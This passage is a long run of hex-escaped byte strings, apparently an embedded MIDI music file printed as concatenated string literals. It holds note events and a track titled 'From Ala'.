/>"\x63\x00\x4b\x63\x29\x57\x00\x00\x51\x00\x00\x53\x00\x00\x4b\x00\x13\x58\x66\x00".<br />"\x53\x66\x00\x50\x66\x00\x4c\x66\x65\x58\x00\x00\x53\x00\x00\x50\x00\x00\x4c\x00".<br />"\x81\x0c\x4f\x63\x00\x4c\x63\x00\x46\x63\x81\x5c\x4f\x00\x00\x4c\x00\x00\x46\x00".<br />"\x13\x51\x57\x00\x4d\x57\x65\x51\x00\x00\x4d\x00\x13\x54\x54\x00\x51\x54\x81\x5d".<br />"\x54\x00\x00\x51\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00\x4d\x00\x13\x51\x57".<br />"\x00\x4d\x57\x01\x45\x57\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x5d\x00\x4c".<br />"\x5d\x00\x43\x5d\x82\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4d\x5a\x00\x4a\x5a".<br />"\x29\x4d\x00\x00\x4a\x00\x13\x4c\x5a\x00\x48\x5a\x29\x4c\x00\x00\x48\x00\x13\x4a".<br />"\x57\x00\x47\x57\x29\x4a\x00\x00\x47\x00\x13\x4c\x57\x00\x48\x57\x29\x4c\x00\x00".<br />"\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x51\x51\x00\x4d\x51".<br />"\x65\x51\x00\x00\x4d\x00\x13\x51\x51\x00\x4d\x51\x29\x51\x00\x00\x4d\x00\x13\x4f".<br />"\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00".<br />"\x4a\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51".<br />"\x29\x4d\x00\x00\x4a\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13\x54".<br />"\x51\x00\x4c\x51\x65\x54\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x29\x54\x00\x00".<br />"\x4c\x00\x13\x56\x51\x00\x4a\x51\x65\x56\x00\x00\x4a\x00\x13\x56\x51\x00\x4a\x51".<br />"\x81\x21\x56\x00\x00\x4a\x00\x13\x54\x51\x29\x54\x00\x13\x53\x51\x29\x53\x00\x13".<br />"\x51\x51\x29\x51\x00\x13\x51\x51\x00\x4c\x51\x65\x51\x00\x00\x4c\x00\x13\x4f\x51".<br />"\x00\x4c\x51\x81\x21\x4f\x00\x00\x4c\x00\x13\x48\x51\x29\x48\x00\x13\x4a\x51\x29".<br />"\x4a\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x51\x00\x47\x51\x65\x4f\x00\x00\x47\x00".<br />"\x13\x4d\x54\x00\x47\x54\x81\x5d\x4d\x00\x00\x47\x00\x13\x47\x60\x00\x41\x60\x01".<br />"\x43\x60\x64\x47\x00\x00\x41\x00\x00\x43\x00\x13\x48\x51\x00\x43\x51\x00\x40\x64".<br />"\x65\x48\x00\x00\x43\x00\x00\x40\x00\x13\x4f\x57\x00\x43\x57\x29\x4f\x00\x00\x43".<br />"\x00\x13\x4f\x54\x00\x43\x54\x29\x4f\x00\x00\x43\x00\x13\x4f\x51\x00\x43\x51\x65".<br />"\x4f\x00\x00\x43\x00\x13\x4f\x54\x00\x43\x54\x65\x4f\x00\x00\x43\x00\x13\x51\x5d".<br />"\x00\x4d\x5d\x01\x45\x5d\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x63\x00\x51".<br />"\x63\x00\x48\x63\x81\x5d\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x51\x00\x4d\x51".<br />"\x00\x45\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x51\x51\x00\x4d\x51\x00\x45".<br />"\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x60\x00\x4c\x60\x00\x43\x60\x82".<br />"\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a".<br />"\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4a\x51\x00\x47\x51\x29".<br />"\x4a\x00\x00\x47\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51".<br />"\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00\x4d".<br />"\x00\x13\x51\x51\x00\x4d\x51\x29\x51\x00\x00\x4d\x00\x13\x4f\x51\x00\x4c\x51\x29".<br />"\x4f\x00\x00\x4c\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51".<br />"\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a".<br />"\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x65".<br />"\x54\x00\x00\x4c\x00\x13\x54\x57\x00\x4c\x57\x29\x54\x00\x00\x4c\x00\x13\x51\x5d".<br />"\x00\x4d\x5d\x01\x45\x5d\x64\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x54\x63\x00\x51".<br />"\x63\x00\x48\x63\x81\x5d\x54\x00\x00\x51\x00\x00\x48\x00\x13\x51\x51\x00\x4d\x51".<br />"\x00\x45\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x51\x51\x00\x4d\x51\x00\x45".<br />"\x64\x65\x51\x00\x00\x4d\x00\x00\x45\x00\x13\x4f\x51\x00\x4c\x51\x00\x43\x64\x82".<br />"\x55\x4f\x00\x00\x4c\x00\x00\x43\x00\x13\x54\x51\x00\x4c\x51\x00\x48\x64\x29\x54".<br />"\x00\x00\x4c\x00\x00\x48\x00\x13\x53\x51\x00\x4a\x51\x00\x47\x64\x29\x53\x00\x00".<br />"\x4a\x00\x00\x47\x00\x13\x51\x51\x00\x48\x51\x00\x45\x64\x29\x51\x00\x00\x48\x00".<br />"\x00\x45\x00\x13\x53\x51\x00\x4a\x51\x00\x47\x64\x29\x53\x00\x00\x4a\x00\x00\x47".<br />"\x00\x13\x54\x51\x00\x51\x51\x00\x48\x64\x29\x54\x00\x00\x51\x00\x00\x48\x00\x13".<br />"\x55\x69\x00\x51\x69\x00\x49\x64\x29\x55\x00\x00\x51\x00\x00\x49\x00\x13\x56\x69".<br />"\x00\x51\x69\x00\x53\x64\x00\x4a\x64\x29\x56\x00\x00\x51\x00\x00\x53\x00\x00\x4a".<br />"\x00\x13\x57\x69\x00\x51\x69\x00\x53\x64\x00\x4b\x64\x29\x57\x00\x00\x51\x00\x00".<br />"\x53\x00\x00\x4b\x00\x13\x58\x69\x00\x53\x69\x00\x50\x64\x00\x4c\x64\x65\x58\x00".<br />"\x00\x53\x00\x00\x50\x00\x00\x4c\x00\x81\x0c\x4f\x69\x00\x4c\x69\x00\x46\x64\x81".<br />"\x5c\x4f\x00\x00\x4c\x00\x00\x46\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00\x4d".<br />"\x00\x13\x54\x51\x00\x51\x51\x81\x5d\x54\x00\x00\x51\x00\x13\x51\x51\x00\x4d\x51".<br />"\x65\x51\x00\x00\x4d\x00\x13\x51\x51\x00\x4d\x51\x01\x45\x64\x64\x51\x00\x00\x4d".<br />"\x00\x00\x45\x00\x13\x4f\x51\x00\x4c\x51\x00\x43\x64\x82\x55\x4f\x00\x00\x4c\x00".<br />"\x00\x43\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51\x00\x48".<br />"\x51\x29\x4c\x00\x00\x48\x00\x13\x4a\x51\x00\x47\x51\x29\x4a\x00\x00\x47\x00\x13".<br />"\x4c\x51\x00\x48\x51\x29\x4c\x00\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00".<br />"\x00\x4a\x00\x13\x51\x51\x00\x4d\x51\x65\x51\x00\x00\x4d\x00\x13\x51\x51\x00\x4d".<br />"\x51\x29\x51\x00\x00\x4d\x00\x13\x4f\x51\x00\x4c\x51\x29\x4f\x00\x00\x4c\x00\x13".<br />"\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4c\x51\x00\x48\x51\x29\x4c\x00".<br />"\x00\x48\x00\x13\x4d\x51\x00\x4a\x51\x29\x4d\x00\x00\x4a\x00\x13\x4f\x51\x00\x4c".<br />"\x51\x29\x4f\x00\x00\x4c\x00\x13\x54\x51\x00\x4c\x51\x65\x54\x00\x00\x4c\x00\x13".<br />"\x54\x51\x00\x4c\x51\x29\x54\x00\x00\x4c\x00\x13\x56\x51\x00\x4a\x51\x65\x56\x00".<br />"\x00\x4a\x00\x13\x56\x51\x00\x4a\x51\x81\x21\x56\x00\x00\x4a\x00\x13\x54\x51\x29".<br />"\x54\x00\x13\x53\x51\x29\x53\x00\x13\x51\x51\x29\x51\x00\x13\x51\x51\x00\x4c\x51".<br />"\x65\x51\x00\x00\x4c\x00\x13\x4f\x51\x00\x4c\x51\x81\x21\x4f\x00\x00\x4c\x00\x13".<br />"\x48\x51\x29\x48\x00\x13\x4a\x51\x29\x4a\x00\x13\x4c\x51\x29\x4c\x00\x13\x4f\x51".<br />"\x00\x47\x51\x65\x4f\x00\x00\x47\x00\x13\x4d\x51\x00\x47\x51\x81\x5d\x4d\x00\x00".<br />"\x47\x00\x13\x47\x51\x00\x41\x51\x01\x43\x51\x64\x47\x00\x00\x41\x00\x00\x43\x00".<br />"\x13\x48\x4e\x00\x43\x4e\x00\x40\x4e\x65\x48\x00\x00\x43\x00\x00\x40\x00\x81\x0c".<br />"\x4f\x51\x14\x4f\x00\x13\x51\x51\x15\x51\x00\x13\x53\x51\x15\x53\x00\x13\x54\x51".<br />"\x00\x4c\x51\x65\x54\x00\x00\x4c\x00\x14\xff\x2f\x00\x4d\x54\x72\x6b\x00\x00\x1e".<br />"\x03\x00\xff\x03\x08\x46\x72\x6f\x6d\x20\x41\x6c\x61\x00\xc2\x07\x00\x07\x82\x69".<br />"\x92\x3c\x40\x64\x3c\x00\x13\x39\x40\x00\x35\x40\x01\x33\x40\x64\x39\x00\x00\x35".<br />"\x00\x00\x33\x00\x13\x39\x3f\x29\x39\x00\x13\x38\x3f\x29\x38\x00\x13\x39\x3f\x29".<br />"\x39\x00\x13\x3b\x3f\x29\x3b\x00\x13\x3c\x3f\x00\x37\x3f\x81\x21\x3c\x00\x00\x37".<br />"\x00\x13\x37\x3f\x29\x37\x00\x13\x34\x3f\x29\x34\x00\x13\x33\x3f\x29\x33\x00\x13".<br />"\x34\x3f\x29\x34\x00\x13\x35\x3f\x29\x35\x00\x13\x37\x3f\x81\x21\x37\x00\x13\x35".<br />"\x3f\x29\x35\x00\x13\x32\x3f\x29\x32\x00\x13\x30\x3f\x29\x30\x00\x13\x34\x3f\x29".<br />"\x34\x00\x13\x32\x3f\x29\x32\x00\x13\x2f\x3f\x29\x2f\x00\x13\x2d\x3f\x29\x2d\x00".<br />"\x13\x2b\x3f\x65\x2b\x00\x81\x0c\x2b\x3f\x00\x1f\x3f\x64\x2b\x00\x00\x1f\x00\x81".<br />"\x0c\x30\x4e\x64\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x2b\x51\x65\x2b\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64".<br />"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51".<br />"\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x51\x65\x2b\x00\x13\x40".<br />"\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65".<br />"\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00".<br />"\x13\x2b\x54\x65\x2b\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64".<br />"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x51\x00\x3c\x51".<br />"\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x41".<br />"\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2b\x51\x65".<br />"\x2b\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00".<br />"\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x31\x57\x65\x31\x00\x13\x43\x57\x00\x3a\x57\x65\x43\x00\x00".<br />"\x3a\x00\x13\x32\x57\x65\x32\x00\x13\x43\x5d\x00\x3e\x5d\x01\x3b\x5d\x64\x43\x00".<br />"\x00\x3e\x00\x00\x3b\x00\x13\x32\x63\x65\x32\x00\x13\x42\x66\x00\x3e\x66\x01\x3c".<br />"\x66\x64\x42\x00\x00\x3e\x00\x00\x3c\x00\x13\x43\x66\x00\x3e\x66\x00\x37\x66\x65".<br />"\x37\x00\x13\x35\x66\x29\x35\x00\x13\x32\x66\x65\x32\x00\x13\x2f\x63\x29\x43\x00".<br />"\x00\x3e\x00\x00\x2f\x00\x13\x2b\x60\x65\x2b\x00\x14\x30\x60\x64\x30\x00\x13\x41".<br />"\x5d\x00\x3c\x5d\x01\x37\x5d\x64\x41\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x57\x65".<br />"\x2b\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00".<br />"\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x2b\x57\x65\x2b\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64".<br />"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54".<br />"\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x31\x54\x65\x31\x00\x13\x40".<br />"\x54\x00\x39\x54\x65\x40\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13\x3e\x54\x00".<br />"\x39\x54\x01\x35\x54\x64\x3e\x00\x00\x39\x00\x00\x35\x00\x13\x35\x54\x65\x35\x00".<br />"\x13\x3e\x54\x00\x39\x54\x65\x3e\x00\x00\x39\x00\x13\x3c\x54\x00\x39\x54\x01\x35".<br />"\x54\x64\x3c\x00\x00\x39\x00\x00\x35\x00\x13\x39\x54\x29\x39\x00\x13\x38\x54\x29".<br />"\x38\x00\x13\x39\x51\x29\x39\x00\x13\x3b\x51\x29\x3b\x00\x13\x3c\x52\x00\x37\x52".<br />"\x81\x21\x3c\x00\x00\x37\x00\x13\x37\x51\x29\x37\x00\x13\x34\x51\x29\x34\x00\x13".<br />"\x32\x51\x29\x32\x00\x13\x34\x51\x29\x34\x00\x13\x35\x51\x29\x35\x00\x13\x37\x51".<br />"\x81\x21\x37\x00\x13\x35\x51\x29\x35\x00\x13\x32\x51\x29\x32\x00\x13\x31\x51\x29".<br />"\x31\x00\x13\x34\x51\x29\x34\x00\x13\x32\x51\x29\x32\x00\x13\x2f\x51\x29\x2f\x00".<br />"\x13\x2d\x51\x29\x2d\x00\x81\x0c\x2b\x51\x64\x2b\x00\x81\x0c\x2b\x51\x00\x1f\x51".<br />"\x64\x2b\x00\x00\x1f\x00\x13\x30\x57\x65\x30\x00\x13\x40\x56\x00\x3c\x56\x01\x37".<br />"\x56\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x51\x00".<br />"\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00".<br />"\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b".<br />"\x54\x65\x2b\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00".<br />"\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00".<br />"\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x54\x00\x3c\x54\x01\x37".<br />"\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00".<br />"\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00".<br />"\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30".<br />"\x54\x65\x30\x00\x13\x41\x54\x00\x3b\x54\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00".<br />"\x37\x00\x13\x2b\x57\x65\x2b\x00\x13\x41\x57\x00\x3b\x57\x01\x37\x57\x64\x41\x00".<br />"\x00\x3b\x00\x00\x37\x00\x13\x30\x57\x65\x30\x00\x13\x40\x58\x00\x3c\x58\x01\x37".<br />"\x58\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x31\x5a\x65\x31\x00\x13\x43\x5d\x00".<br />"\x3a\x5d\x65\x43\x00\x00\x3a\x00\x13\x32\x60\x65\x32\x00\x13\x43\x63\x00\x3e\x63".<br />"\x01\x3b\x63\x64\x43\x00\x00\x3e\x00\x00\x3b\x00\x13\x32\x66\x65\x32\x00\x13\x42".<br />"\x66\x00\x3e\x66\x01\x3c\x66\x64\x42\x00\x00\x3e\x00\x00\x3c\x00\x13\x43\x66\x00".<br />"\x3e\x66\x00\x37\x66\x65\x37\x00\x13\x35\x66\x29\x35\x00\x13\x32\x66\x65\x32\x00".<br />"\x13\x2f\x63\x29\x43\x00\x00\x3e\x00\x00\x2f\x00\x13\x2b\x62\x65\x2b\x00\x14\x30".<br />"\x5d\x64\x30\x00\x13\x41\x5d\x00\x3c\x5d\x01\x37\x5d\x64\x41\x00\x00\x3c\x00\x00".<br />"\x37\x00\x13\x2b\x5a\x65\x2b\x00\x13\x40\x5a\x00\x3c\x5a\x01\x37\x5a\x64\x40\x00".<br />"\x00\x3c\x00\x00\x37\x00\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37".<br />"\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x54\x00".<br />"\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00".<br />"\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x31".<br />"\x51\x65\x31\x00\x13\x40\x54\x00\x39\x54\x65\x40\x00\x00\x39\x00\x13\x30\x54\x65".<br />"\x30\x00\x13\x3e\x54\x00\x39\x54\x01\x35\x54\x64\x3e\x00\x00\x39\x00\x00\x35\x00".<br />"\x13\x35\x54\x65\x35\x00\x13\x3e\x54\x00\x39\x54\x65\x3e\x00\x00\x39\x00\x13\x3f".<br />"\x54\x00\x3c\x54\x01\x39\x54\x00\x36\x54\x64\x3f\x00\x00\x3c\x00\x00\x39\x00\x00".<br />"\x36\x00\x81\x0c\x3f\x51\x00\x3c\x51\x00\x39\x51\x00\x36\x51\x64\x3f\x00\x00\x3c".<br />"\x00\x00\x39\x00\x00\x36\x00\x81\x0c\x40\x54\x00\x3c\x54\x00\x37\x54\x64\x40\x00".<br />"\x00\x3c\x00\x00\x37\x00\x13\x39\x54\x00\x2d\x54\x65\x39\x00\x00\x2d\x00\x13\x2d".<br />"\x54\x00\x21\x54\x81\x5d\x2d\x00\x00\x21\x00\x13\x32\x54\x00\x26\x54\x65\x32\x00".<br />"\x00\x26\x00\x13\x37\x54\x00\x2b\x54\x65\x37\x00\x00\x2b\x00\x13\x2b\x57\x00\x1f".<br />"\x57\x81\x5d\x2b\x00\x00\x1f\x00\x13\x30\x57\x00\x24\x57\x65\x30\x00\x00\x24\x00".<br />"\x81\x0c\x30\x54\x00\x24\x54\x64\x30\x00\x00\x24\x00\x81\x0c\x29\x57\x64\x29\x00".<br />"\x13\x41\x5a\x00\x3c\x5a\x01\x39\x5a\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d".<br />"\x5a\x65\x2d\x00\x13\x41\x5a\x00\x3c\x5a\x01\x39\x5a\x64\x41\x00\x00\x3c\x00\x00".<br />"\x39\x00\x13\x30\x5d\x65\x30\x00\x13\x40\x5d\x00\x3c\x5d\x01\x37\x5d\x64\x40\x00".<br />"\x00\x3c\x00\x00\x37\x00\x13\x34\x5d\x65\x34\x00\x13\x40\x5d\x00\x3c\x5d\x01\x37".<br />"\x5d\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x5d\x65\x2b\x00\x13\x41\x5d\x00".<br />"\x3b\x5d\x01\x37\x5d\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x5a\x65\x2f\x00".<br />"\x13\x41\x5a\x00\x3b\x5a\x01\x37\x5a\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30".<br />"\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00".<br />"\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00".<br />"\x00\x3c\x00\x00\x37\x00\x13\x29\x54\x65\x29\x00\x13\x41\x54\x00\x3c\x54\x01\x39".<br />"\x54\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x41\x54\x00".<br />"\x3c\x54\x01\x39\x54\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00".<br />"\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34".<br />"\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00".<br />"\x37\x00\x13\x39\x54\x00\x2d\x54\x65\x39\x00\x00\x2d\x00\x13\x40\x57\x00\x3c\x57".<br />"\x01\x39\x57\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x57\x00\x29\x57\x65\x35".<br />"\x00\x00\x29\x00\x13\x35\x57\x00\x29\x57\x65\x35\x00\x00\x29\x00\x13\x34\x5a\x00".<br />"\x28\x5a\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x60\x00\x30\x60\x81\x5c\x3c\x00\x00".<br />"\x30\x00\x13\x29\x60\x65\x29\x00\x13\x41\x5d\x00\x3c\x5d\x01\x39\x5d\x64\x41\x00".<br />"\x00\x3c\x00\x00\x39\x00\x13\x2d\x5a\x65\x2d\x00\x13\x41\x5a\x00\x3c\x5a\x01\x39".<br />"\x5a\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x5a\x65\x30\x00\x13\x40\x5a\x00".<br />"\x3c\x5a\x01\x37\x5a\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x5a\x65\x34\x00".<br />"\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30".<br />"\x57\x65\x30\x00\x13\x41\x57\x00\x3b\x57\x01\x37\x57\x64\x41\x00\x00\x3b\x00\x00".<br />"\x37\x00\x13\x34\x57\x65\x34\x00\x13\x41\x57\x00\x3b\x57\x01\x37\x57\x64\x41\x00".<br />"\x00\x3b\x00\x00\x37\x00\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37".<br />"\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x57\x65\x34\x00\x13\x40\x57\x00".<br />"\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00".<br />"\x13\x3e\x54\x00\x3c\x54\x01\x39\x54\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x35".<br />"\x54\x65\x35\x00\x13\x3f\x54\x00\x3c\x54\x01\x39\x54\x64\x3f\x00\x00\x3c\x00\x00".<br />"\x39\x00\x13\x37\x54\x65\x37\x00\x13\x40\x54\x00\x3c\x54\x65\x40\x00\x00\x3c\x00".<br />"\x13\x34\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x32\x54\x65\x32\x00\x13\x3e\x54\x00\x37\x54\x65\x3e\x00\x00".<br />"\x37\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x51\x00\x24".<br />"\x51\x65\x30\x00\x00\x24\x00\x82\x7c\x29\x51\x64\x29\x00\x13\x41\x51\x00\x3c\x51".<br />"\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x41".<br />"\x54\x00\x3c\x54\x01\x39\x54\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65".<br />"\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00".<br />"\x13\x34\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x41\x54\x00\x3b\x54\x01\x37\x54\x64".<br />"\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x54\x65\x2f\x00\x13\x41\x54\x00\x3b\x54".<br />"\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40".<br />"\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65".<br />"\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00".<br />"\x13\x29\x54\x65\x29\x00\x13\x41\x54\x00\x3c\x54\x01\x39\x54\x64\x41\x00\x00\x3c".<br />"\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x41\x54\x00\x3c\x54\x01\x39\x54\x64".<br />"\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54".<br />"\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x54\x65\x34\x00\x13\x40".<br />"\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x39\x57\x00".<br />"\x2d\x57\x65\x39\x00\x00\x2d\x00\x13\x40\x57\x00\x3c\x57\x01\x39\x57\x64\x40\x00".<br />"\x00\x3c\x00\x00\x39\x00\x13\x35\x57\x00\x29\x57\x65\x35\x00\x00\x29\x00\x13\x35".<br />"\x57\x00\x29\x57\x65\x35\x00\x00\x29\x00\x13\x34\x57\x00\x28\x57\x65\x34\x00\x00".<br />"\x28\x00\x81\x0c\x3c\x57\x00\x30\x57\x81\x5c\x3c\x00\x00\x30\x00\x13\x29\x51\x65".<br />"\x29\x00\x13\x41\x51\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00".<br />"\x13\x2d\x51\x65\x2d\x00\x13\x41\x51\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c".<br />"\x00\x00\x39\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64".<br />"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51".<br />"\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x41".<br />"\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x34\x51\x65".<br />"\x34\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00".<br />"\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c".<br />"\x00\x00\x37\x00\x13\x34\x52\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64".<br />"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x3e\x54\x00\x3c\x54".<br />"\x01\x39\x54\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x54\x65\x35\x00\x13\x3f".<br />"\x54\x00\x3c\x54\x01\x39\x54\x64\x3f\x00\x00\x3c\x00\x00\x39\x00\x13\x37\x51\x65".<br />"\x37\x00\x13\x40\x51\x00\x3c\x51\x65\x40\x00\x00\x3c\x00\x13\x34\x51\x65\x34\x00".<br 